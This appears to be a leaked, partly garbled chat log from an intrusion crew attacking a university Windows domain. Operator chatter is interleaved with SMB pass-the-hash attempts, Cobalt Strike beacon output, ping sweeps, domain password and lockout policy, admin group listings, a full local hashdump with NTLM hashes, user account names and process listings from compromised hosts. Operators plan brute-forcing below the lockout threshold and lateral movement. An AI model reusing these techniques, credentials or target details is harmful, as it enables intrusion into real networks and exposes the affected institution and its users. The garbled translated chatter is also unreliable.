139.62.59.222:445 - 139.62.59.222:445 - Could not connect [-] 139.62.58.46:445 - 139.62.58.46:445 - Could not connect [-] 139.62.58.195:445 - 139.62.58.195:445 - Could not connect [-] 139.62.59.25:445 - 139.62.59.25:445 - Could not 
connect [-] 139.62.59.237:445 - 139.62.59.237:445 - Could not connect [-] 139.62.59.243:445 - 139.62.59.243:445 - Could not connect [-] 139.62.57.36:445 - 139.62.57.36:445 - Could not connect [-] 139.62.59.141:445 - 139.62.59.141:445 - Could not connect [-] 139.62.57.214:445 - 139.62.57.214:445 - Could not connect ``Well, what do you see but don't respond smb445 port can't see it and pinged this 7530 Objects returned not 1k there [-] 139.62.57.204:445 - 139.62.57.204:445 - Could not connect [-] 139.62.59.17:445 - 139.62.59.17:445 - Could not connect [-] 139.62.58.245:445 - 139.62.58.245:445 - Could not connect [-] 139.62.59.86:445 - 139.62.59.86:445 - Could not connect [-] 139.62.59.31:445 - 139.62.59.31:445 - Could not connect [-] 139.62.59.124:445 - 139.62.59.124:445 - Could not connect [-] 139.62.59.14:445 - 139.62.59.14:445 - Could not connect [-] 139.62.58.244:445 - 139.62.58.244:445 - Could not connect [-] 139.62.59.198:445 - 139.62.59.198:445 - Could not connect [-] 139.62.58.140:445 - 139.62.58.140:445 - Could not connect ``There's a load of 128 out of 1k stop, not all of it```.
139.62.59.113 139.62.58.236 139.62.59.172 139.62.58.7 139.62.59.150 139.62.59.240 139.62.59.79 139.62.59.116 139.62.59.213 139.62.58.100 139.62.59.20 139.62.58.67 139.62.57.184 139.62.57.113 139.62.59.234 139.62.59.112 139.62.58.81 139.62.58.47 139.62.58.117 139.62.59.117 139.62.58.193 139.62.57.208 139.62.58.97 139.62.58.72 139.62.58.75 139.62.59.135 139.62.59.203 139.62.58.68 139.62.58.223 139.62.57.232 139.62.59.200 139.62.59.99 139.62.59.35 139.62.57.216 139.62.57.19 139.62.57.100 139.62.59.223 139.62.57.66 139.62.59.220 139.62.57.152 139.62.58.86 139.62.134.212 139.62.58.215 139.62.57.240 139.62.58.43 139.62.59.97 139.62.57.129 139.62.59.19 139.62.58.99 139.62.58.144 139.62.59.71 139.62.59.92 139.62.57.212 139.62.57.49 139.62.57.170 139.62.58.118 139.62.59.15 139.62.59.127 139.62.57.191 139.62.57.11 139.62.59.165 139.62.58.243 139.62.59.0 139.62.58.216 139.62.58.135 139.62.58.0 139.62.57.44 139.62.58.51 139.62.58.210 139.62.58.231 139.62.58.105 139.62.59.16 139.62.59.251 139.62.58.153 139.62.57.130 139.62.59.212 139.62.57.23 139.62.58.225 139.62.58.221 139.62.59.34 139.62.57.27 139.62.59.192 139.62.58.208 139.62.57.82 139.62.57.157 139.62.57.52 139.62.58.74 139.62.57.182 139.62.57.69 139.62.57.201 139.62.58.177 139.62.58.48 139.62.59.75 139.62.58.201 139.62.58.237 139.62.59.232 139.62.57.56 139.62.57.13 139.62.58.20 139.62.58.93 139.62.59.236 139.62.59.161 139.62.57.204 139.62.59.17 139.62.58.245 139.62.57.118 139.62.57.227 139.62.59.229 139.62.59.87 139.62.59.86 139.62.59.124 139.62.59.31 139.62.59.14 139.62.59.198 139.62.58.140 139.62.58.244 139.62.58.40 139.62.57.116 139.62.59.174 139.62.59.222 139.62.58.46 139.62.58.195 139.62.59.25 139.62.57.36 139.62.59.243 139.62.59.237 139.62.59.141 139.62.57.214 ``I mean you have admin access to all the PCs covered? It's all win 10 eh) everywhere admin .\Administrator with this hash to all and sundry computes here `U=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=edu` ``Do not fit``. 
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\donh:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\donovanf:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\johns:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\krist:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\mikeh:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\nates:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\ServiceAdmin:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668', ``then change the hashga''. beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 393 bytes [+] received output: unfcsd.unf.edu The ``domain'' is correct by the way? OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu ``` I'm building these now, there's a shitload of them and they're all on the same subnet, and they're also Win 10 Education ``` aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668 ``it takes a full hash that is not tacon takes a hash and what's wrong with it?
OU=_Testing,OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu ``` there are 4 of them here, only the one I'm sitting on now is alive?)) by pkk groups YES didn't fit ``` [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\Administrator:011f7088683980681019eb43397e2668', [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\donh:011f7088683980681019eb43397e2668', [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\donovanf:011f7088683980681019eb43397e2668', [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\johns:011f7088683980681019eb43397e2668', [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\krist:011f7088683980681019eb43397e2668', [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\mikeh:011f7088683980681019eb43397e2668', [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\nates:011f7088683980681019eb43397e2668', [-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\ServiceAdmin:011f7088683980681019eb43397e2668', ``Everybody calm down, there will be few attempts if you can't find it all,`` but take it easy on his hash on 1 attempt at each acKLA already after the check YES I'll brute-force that YES we're talking about check YES right now) LA - a local lockout is a domain policy on LA does not work lockoutka as well as logialerts did not cancel the lockout 5 minutes the main thing is not overdo it, there's a threshold on 6 tries and his hash would have checked for YES I would have checked the server win from that pool first he's local admin on more than a dozen ncs for sure Check the current local user Administrator928 of 1066?)you search for _Testing and find from two groups of pk `` _Testing,,OU=Computers `````` _Testing,OU=Frozen,OU=Computers ``certainly there could be such a situation OU=_Testing,OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
`````` OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu `````` OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu ``OU=_Testing - 4 pc in the same group dn:CN=COB-62001,OU=_Testing,OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu ``his OU and so on a group of pc's current from hell compszhyvye cars in the subnet :thinking: and what did you mean by that? (ICMP) Target '139.62.58.0' is alive. [read 8 bytes] (ICMP) Target '139.62.58.15' is alive. [read 8 bytes] (ICMP) Target '139.62.58.20' is alive. [read 8 bytes] (ICMP) Target '139.62.58.7' is alive. [read 8 bytes] (ICMP) Target '139.62.58.23' is alive. [read 8 bytes] (ICMP) Target '139.62.58.29' is alive. [read 8 bytes] [+] received output: (ICMP) Target '139.62.58.45' is alive. [read 8 bytes] (ICMP) Target '139.62.58.50' is alive. [read 8 bytes] (ICMP) Target '139.62.58.62' is alive. [read 8 bytes] (ICMP) Target '139.62.58.51' is alive. [read 8 bytes] (ICMP) Target '139.62.58.48' is alive. [read 8 bytes] (ICMP) Target '139.62.58.67' is alive. [read 8 bytes] (ICMP) Target '139.62.58.47' is alive. [read 8 bytes] (ICMP) Target '139.62.58.43' is alive. [read 8 bytes] (ICMP) Target '139.62.58.68' is alive. [read 8 bytes] (ICMP) Target '139.62.58.72' is alive. [read 8 bytes] (ICMP) Target '139.62.58.74' is alive. [read 8 bytes] (ICMP) Target '139.62.58.75' is alive. [read 8 bytes] (ICMP) Target '139.62.58.81' is alive. [read 8 bytes] (ICMP) Target '139.62.58.84' is alive. [read 8 bytes] (ICMP) Target '139.62.58.95' is alive. [read 8 bytes] (ICMP) Target '139.62.58.102' is alive. [read 8 bytes] (ICMP) Target '139.62.58.86' is alive. [read 8 bytes] (ICMP) Target '139.62.58.89' is alive. [read 8 bytes] (ICMP) Target '139.62.58.97' is alive. [read 8 bytes] (ICMP) Target '139.62.58.100' is alive. [read 8 bytes] (ICMP) Target '139.62.58.87' is alive. [read 8 bytes] (ICMP) Target '139.62.58.93' is alive. [read 8 bytes] (ICMP) Target '139.62.58.101' is alive. [read 8 bytes] (ICMP) Target '139.62.58.98' is alive. 
[read 8 bytes] (ICMP) Target '139.62.58.85' is alive. [read 8 bytes] (ICMP) Target '139.62.58.105' is alive. [read 8 bytes] (ICMP) Target '139.62.58.99' is alive. [read 8 bytes] (ICMP) Target '139.62.58.94' is alive. [read 8 bytes] (ICMP) Target '139.62.58.115' is alive. [read 8 bytes] (ICMP) Target '139.62.58.120' is alive. [read 8 bytes] (ICMP) Target '139.62.58.124' is alive. [read 8 bytes] (ICMP) Target '139.62.58.117' is alive. [read 8 bytes] (ICMP) Target '139.62.58.118' is alive. [read 8 bytes] (ICMP) Target '139.62.58.126' is alive. [read 8 bytes] (ICMP) Target '139.62.58.127' is alive. [read 8 bytes] (ICMP) Target '139.62.58.135' is alive. [read 8 bytes] (ICMP) Target '139.62.58.146' is alive. [read 8 bytes] (ICMP) Target '139.62.58.144' is alive. [read 8 bytes] (ICMP) Target '139.62.58.153' is alive. [read 8 bytes] (ICMP) Target '139.62.58.151' is alive. [read 8 bytes] (ICMP) Target '139.62.58.152' is alive. [read 8 bytes] (ICMP) Target '139.62.58.162' is alive. [read 8 bytes] [+] received output: (ICMP) Target '139.62.58.190' is alive. [read 8 bytes] (ICMP) Target '139.62.58.177' is alive. [read 8 bytes] (ICMP) Target '139.62.58.193' is alive. [read 8 bytes] (ICMP) Target '139.62.58.188' is alive. [read 8 bytes] (ICMP) Target '139.62.58.198' is alive. [read 8 bytes] (ICMP) Target '139.62.58.201' is alive. [read 8 bytes] (ICMP) Target '139.62.58.210' is alive. [read 8 bytes] (ICMP) Target '139.62.58.208' is alive. [read 8 bytes] (ICMP) Target '139.62.58.212' is alive. [read 8 bytes] (ICMP) Target '139.62.58.215' is alive. [read 8 bytes] (ICMP) Target '139.62.58.216' is alive. [read 8 bytes] (ICMP) Target '139.62.58.225' is alive. [read 8 bytes] (ICMP) Target '139.62.58.221' is alive. [read 8 bytes] (ICMP) Target '139.62.58.226' is alive. [read 8 bytes] (ICMP) Target '139.62.58.231' is alive. [read 8 bytes] (ICMP) Target '139.62.58.229' is alive. [read 8 bytes] (ICMP) Target '139.62.58.237' is alive. [read 8 bytes] (ICMP) Target '139.62.58.236' is alive. 
[read 8 bytes] (ICMP) Target '139.62.58.223' is alive. [read 8 bytes] (ICMP) Target '139.62.58.243' is alive. [read 8 bytes] (ICMP) Target '139.62.58.252' is alive. [read 8 bytes] ``A lot of cars in the same group where you are now?`` The request will be processed at a domain controller for domain unfcsd.unf.edu. Force user logoff how long after time expires?: Never Minimum password age (days): 0 Maximum password age (days): 366 Minimum password length: 15 Length of password history maintained: 4 Lockout threshold: 6 Lockout duration (minutes): 5 Lockout observation window (minutes): 4 Computer role: BACKUP The command completed successfully. ``Parallel politician more np Alias name administrators Comment Members ------------------------------------------------------------------------------- Administrator UNFCSD/CCB Techs UNFCSD\Domain Admins UNFCSD\EMPLOYEE UNFCSD/Student Domain Users UNFCSD\Workstation Admins The command completed successfully. Give me another list of LA with this car is not fatal 1 check for each DA? that brut is not good so I do not know how to help brut on all the DA of the Passan kmd 5hash LA administrator "do not know how to help") ) funny)) the logopass gives hash kompachekay it somewhere)) the logopass? 
well, the LA hash you have they are local do not know how to help I did it yesterday `` Administrator:500:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:6e150af7e813d5c5c60cbc60ce89e17e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:af2b63295b0410a5ae59ec5cd12e7e44::: ``create in the first hashdump`` CEC-59126` but not here, has access to remote run commands but no admin rights`` COB-62001`` here sees systems processes CEC-59126 ``` PID PPID Name Arch Session User --- ---- ---- ---- ------- ---- 0 0 [System Process] 4 0 System 120 4 Registry 476 4 smss.exe 3280 4 Memory Compression 624 612 csrss.exe 704 612 wininit.exe 812 704 services.exe 580 812 svchost.exe 584 812 svchost.exe 972 812 svchost.exe 984 812 svchost.exe 740 984 dllhost.exe 1748 984 RuntimeBroker.exe x64 1 2460 984 AcrobatNotificationClient.exe x86 1 UNFCSD\N00865522 3088 984 WmiPrvSE.exe 3156 984 WmiPrvSE.exe 5208,984 WmiPrvSE.exe 5852 984 WmiPrvSE.exe 6576 984 unsecapp.exe 7200 984 pcaevents.exe 8408,984 RuntimeBroker.exe x64 1 UNFCSD\N00865522 8460 984 LockApp.exe x64 1 UNFCSD\N00865522 9376 984 WmiPrvSE.exe 10068 984 WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe x64 1 UNFCSD\N00865522 10720 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522 10996 984 ShellExperienceHost.exe x64 1 UNFCSD\N00865522 11464 984 SearchUI.exe x64 1 UNFCSD\N00865522 11492 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522 11724 984 YourPhone.exe x64 1 UNFCSD\N00865522 11776 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522 12476 984 smartscreen.exe x64 1 UNFCSD\N00865522 14220 984 SavApi.exe x86 1 UNFCSD\N00865522 15196 984 SkypeApp.exe x64 1 UNFCSD\N00865522 15888 984 SettingSyncHost.exe x64 1 UNFCSD\N00865522 17600 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522 18732 984 
ApplicationFrameHost.exe x64 1 UNFCSD\N00865522 20836 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522 20896 984 backgroundTaskHost.exe x64 1 UNFCSD\N00865522 23444 984 Microsoft.Photos.exe x64 1 UNFCSD\N00865522 23592 984 Video.UI.exe x64 1 UNFCSD\N00865522 25964 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522 26764 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522 32996 984 SDXHelper.exe x86 1 UNFCSD\N00865522 63316 984 WmiPrvSE.exe 1076 812 svchost.exe 1096 812 svchost.exe 1120 812 svchost.exe 1148 812 svchost.exe 1204 812 svchost.exe 1212 812 svchost.exe 1220 812 svchost.exe 1224 812 svchost.exe 1236 812 svchost.exe 1240 812 svchost.exe 1400 812 svchost.exe 1432 812 svchost.exe 1484 812 svchost.exe 6916 1484 taskhostw.exe x64 1 12896 1484 SDXHelper.exe x86 1 UNFCSD\N00865522 30308 1484 CompatTelRunner.exe 9076 30308 CompatTelRunner.exe 51856 30308 conhost.exe 41348 1484 OfficeC2RClient.exe 1512 812 svchost.exe 1532 812 svchost.exe 1584 812 SEDService.exe 1592 812 McsClient.exe 1604 812 svchost.exe 1652 812 svchost.exe 1676 812 svchost.exe 1800 812 PresentationFontCache.exe 1804 812 svchost.exe 1924 812 svchost.exe 1952 812 svchost.exe 1976 812 AGSService.exe 2008 812 SophosCleanM.exe 2012 812 WUDFHost.exe 2092 812 svchost.exe 2100 812 svchost.exe 2112 812 svchost.exe 2228 812 svchost.exe 2272 812 svchost.exe 1396 2272 sihchost.exe x64 1 UNFCSD\N00865522 2388 812 svchost.exe 2472 812 svchost.exe 2592 812 svchost.exe 2740 812 svchost.exe 2772 812 svchost.exe 2828 812 svchost.exe 2912 812 hmpalert.exe 3020 812 svchost.exe 3076 812 HPBDSService.exe 3164 812 nvvsvc.exe 3172 812 nvSCPAPISvr.exe 3204 812 svchost.exe 3240 812 svchost.exe 3248 812 svchost.exe 3256 812 svchost.exe 3316 812 igfxCUIService.exe 3352 812 svchost.exe 3360 812 svchost.exe 3432 812 svchost.exe 3448 812 OfficeClickToRun.exe 3572 812 SavService.exe 3628 812 HeciServer.exe 3684 812 svchost.exe 3688 812 svchost.exe 3700 812 svchost.exe 3708 812 svchost.exe 3832 812 svchost.exe 3856 812 svchost.exe 3924 812 
securityHealthService.exe 3936 812 svchost.exe 4036 812 NetworkLicenseServer.exe 4056 812 AeXNSAgent.exe 4064 812 AdobeUpdateService.exe 7888 4064 Adobe Installer.exe x86 1 4076 812 uUACTokenSvc.exe 4084 812 AGMService.exe 4092 812 svchost.exe 4116 812 SMSvcHost.exe 4124 812 SAVAdminService.exe 4200 812 swc_service.exe 4224 812 swi_filter.exe 5484 4224 swi_fc.exe 4240 812 SSPService.exe 4248 812 swi_service.exe 4264 812 svchost.exe 4272 812 svchost.exe 4288 812 svchost.exe x64 1 UNFCSD\N00865522 4296 812 svchost.exe 4304 812 svchost.exe 4312 812 svchost.exe 4320 812 svchost.exe 4328 812 svchost.exe 4336 812 svchost.exe 4344 812 svchost.exe 4352 812 svchost.exe 4360 812 svchost.exe 4368 812 svchost.exe 4400 812 SophosHealth.exe 4532 812 CptService.exe 4580 812 svchost.exe 4612 812 mqsvc.exe 4808 812 McsAgent.exe 4836 812 svchost.exe 4920 812 escsvc64.exe 5236 812 svchost.exe 5380 812 svchost.exe 5580 812 svchost.exe 6064 812 svchost.exe 6244 812 SMSvcHost.exe 6276 812 SeaPort.EXE 6520 812 svchost.exe 6780 812 ALsvc.exe 6824 812 CcmExec.exe 9716 6824 SCNotification.exe x64 1 UNFCSD\N00865522 6992 812 svchost.exe 8372 6992 ctfmon.exe x64 1 UNFCSD\N00865522 7564 812 DbxSvc.exe 7688 812 svchost.exe 8348 812 SophosSafestore64.exe 8840 812 svchost.exe 8884 812 sdcservice.exe 9012 812 svchost.exe 9368 812 jhi_service.exe 9568 812 LMS.exe 9732 812 svchost.exe 9760 812 UNS.exe 9828 812 svchost.exe 10060 812 SgrmBroker.exe 10112 812 SophosFS.exe 29752 10112 SophosFileScanner.exe 9348 29752 SophosFileScanner.exe 10424 812 svchost.exe x64 1 UNFCSD\N00865522 10560 812 svchost.exe 10940 812 Ctes.exe 22044 10940 ProviderHost.exe 16716 22044 conhost.exe 13384 812 svchost.exe 13932 812 svchost.exe 14060 812 svchost.exe 14152 812 svchost.exe 16408 812 svchost.exe 17164 812 svchost.exe x64 1 17608 812 svchost.exe 18232 812 svchost.exe 19872 812 uhssvc.exe 22292 812 abtSvcHost_.exe 23436 812 armsvc.exe 23660 812 scheduler.exe 9960 23660 FortiSSLVPNdaemon.exe 12932 23660 
FortiSettings.exe 17876 23660 FortiTray.exe x64 1 24000 23660 FCDBLog.exe 23760 812 rpcnet.exe 24672 812 svchost.exe 25004 812 SophosNtpService.exe 26528 812 svchost.exe 26592 812 svchost.exe x64 1 26708 812 spoolsv.exe 27276 812 rpcld.exe 27816 812 CtesHostSvc.exe 28668 812 CtHWiPrvService.exe 28864 812 policyHost.exe 29052 812 SearchIndexer.exe 50868 29052 SearchProtocolHost.exe 54572 29052 SearchFilterHost.exe 824 704 lsass.exe 1004 704 fontdrvhost.exe 716 696 csrss.exe 804 696 winlogon.exe 772 804 dwm.exe 996 804 fontdrvhost.exe 12304 804 cmd.exe x64 1 30620 12304 conhost.exe x64 1 UNFCSD\N00865522 18600 804 cmd.exe x64 1 UNFCSD\N00865522 26296 18600 conhost.exe x64 1 UNFCSD\N00865522 26088 804 cmd.exe x64 1 UNFCSD\N00865522 28580 26088 conhost.exe x64 1 UNFCSD\N00865522 27996 804 cmd.exe x64 1 UNFCSD\N00865522 22668 27996 conhost.exe x64 1 UNFCSD\N00865522 28844 804 logonUI.exe 30016 804 cmd.exe x64 1 UNFCSD\N00865522 26120 30016 conhost.exe x64 1 UNFCSD\N00865522 27504 30016 SharpShares.exe x64 1 UNFCSD\N00865522 9352 9336 GoogleCrashHandler.exe 9360 9336 GoogleCrashHandler64.exe 10460 10384 igfxEM.exe x64 1 UNFCSD\N00865522 10484 10384 igfxHK.exe x64 1 UNFCSD\N00865522 10576 10384 igfxTray.exe x64 1 UNFCSD\N00865522 10664 10588 explorer.exe x64 1 UNFCSD\N00865522 4552 10664 CCXProcess.exe x64 1 UNFCSD\N00865522 15200 4552 node.exe x64 1 UNFCSD\N00865522 15212 15200 conhost.exe x64 1 UNFCSD\N00865522 11216 10664 SecurityHealthSystray.exe x64 1 UNFCSD\N00865522 13660 10664 OneDrive.exe x86 1 UNFCSD\N00865522 13740 10664 hppfaxprintersrv.exe x64 1 UNFCSD\N00865522 13844 10664 Apoint.exe x64 1 UNFCSD\N00865522 13812 13844 ApMsgFwd.exe x64 1 UNFCSD\N00865522 14420 13844 hidfind.exe x64 1 UNFCSD\N00865522 13896 10664 Sophos UI.exe x64 1 UNFCSD\N00865522 14052 10664 express.exe x86 1 UNFCSD\N00865522 16652 14052 CefSharp.BrowserSubprocess.exe x86 1 UNFCSD\N00865522 19908 10664 Zoom.exe x86 1 UNFCSD\N00865522 12532 19908 Zoom.exe x86 1 UNFCSD\N00865522 12848 3200 
Teams.exe x86 1 UNFCSD\N00865522 3324 12848 Teams.exe x86 1 UNFCSD\N00865522 6696 12848 Teams.exe x86 1 UNFCSD\N00865522 6844 12848 Teams.exe x86 1 UNFCSD\N00865522 16964 12848 Teams.exe x86 1 UNFCSD\N00865522 17508,12848 Teams.exe x86 1 UNFCSD\N00865522 24584 12848 Teams.exe x86 1 UNFCSD\N00865522 25340 12848 Teams.exe x86 1 UNFCSD\N00865522 33028 12848 Teams.exe x86 1 UNFCSD\N00865522 13132 8176 dllhost.exe 14396 14864 EEventManager.exe x86 1 UNFCSD\N00865522 14428 14412 ApntEx.exe x64 1 UNFCSD\N00865522 14444 14428 conhost.exe x64 1 UNFCSD\N00865522 14972 14864 iusb3mon.exe x86 1 UNFCSD\N00865522 15260 14864 hpwuschd2.exe x86 1 UNFCSD\N00865522 15280 14864 jusched.exe x86 1 UNFCSD\N00865522 17696 15280 jucheck.exe x86 1 UNFCSD\N00865522 15308 14864 Creative Cloud.exe x64 1 UNFCSD\N00865522 15416 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522 15492 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522 16120 15308 Adobe Desktop Service.exe x86 1 UNFCSD\N00865522 11900 16120 CoreSync.exe x86 1 UNFCSD\N00865522 16764 16120 Creative Cloud Helper.exe x64 1 UNFCSD\N00865522 17360 15308 AdobeIPCBroker.exe x86 1 UNFCSD\N00865522 25664 15308 CCLibrary.exe x64 1 UNFCSD\N00865522 27556 25664 node.exe x64 1 UNFCSD\N00865522 15848 27556 conhost.exe x64 1 UNFCSD\N00865522 27656 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522 28880 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522 22540 21392 Dropbox.exe x86 1 UNFCSD\N00865522 17332 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522 19912 22540 Dropbox.exe x86 1 UNFCSD\N00865522 21868 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522 21872 22540 Dropbox.exe x86 1 UNFCSD\N00865522 22832 1772 acrotray.exe x86 1 UNFCSD\N00865522 27932 51660 MicrosoftEdge_X64_87.0.664.52_87.0.664.47.exe 51156 27932 setup.exe 22624 51156 setup.exe ``COB-62001 ``` PID PPID Name Arch Session User --- ---- ---- ---- ------- ---- 0 0 [System Process] 4 0 System x64 0 56 4 Secure System x64 0 NT AUTHORITY\SYSTEM 112 4 Registry x64 0 NT 
AUTHORITY\SYSTEM 352 4 smss.exe x64 0 NT AUTHORITY\SYSTEM 1768 4 Memory Compression x64 0 NT AUTHORITY\SYSTEM 528 512 csrss.exe x64 0 NT AUTHORITY\SYSTEM 656 512 wininit.exe x64 0 NT AUTHORITY\SYSTEM 84 656 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 752 656 services.exe x64 0 NT AUTHORITY\SYSTEM 552 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 940 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 980 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 1292 980 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1412 980 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE 5832 1412 rundll32.exe x64 0 UNFCSD\n01447311 4484 5832 cmd.exe x64 0 UNFCSD\n01447311 1072 4484 timeout.exe x64 0 UNFCSD\n01447311 4444 4484 conhost.exe x64 0 UNFCSD\n01447311 2720 980 WmiPrvSE.exe x64 0 NT AUTHORITY\n0144311 2724 980 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM 4844 980 WmiPrvSE.exe x64 0 NT AUTHORITY/\SYSTEM 1088 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 1108 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 1184 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 1200 752 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1268 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1296 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1356 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 1452 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1500 752 atiesrxx.exe x64 0 NT AUTHORITY\SYSTEM 3292 1500 atieclxx.exe x64 1 NT AUTHORITY\SYSTEM 1548 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1556 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1564 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1572 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 1592 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1600 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1608 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1616 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1624 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1632 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1648 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1780 752 igfxCUIService.exe x64 0 NT 
AUTHORITY/LOCAL SERVICE 1832 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1916 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 1956 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1968 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2024 752 CcmExec.exe x64 0 NT AUTHORITY\SYSTEM 2128 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2136 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2164 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2208 752 svchost.exe x64 0 NT AUTHORITY/ LOCAL SERVICE 2212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2224 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2256 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2380 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2492 752 svchost.exe x64 0 NT AUTHORITY/\LOCAL SERVICE 2508 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2552 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2560 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2728 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2764 752 SgrmBroker.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2788 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2896 752 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM 2920 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2984 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3024 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3028 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3076 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 3156 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3224 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 3320 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 3332 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3344 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 3372 752 MsMpEng.exe x64 0 NT AUTHORITY\SYSTEM 3412 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 3492 752 svchost.exe x64 0 NT AUTHORITY/NETWORK 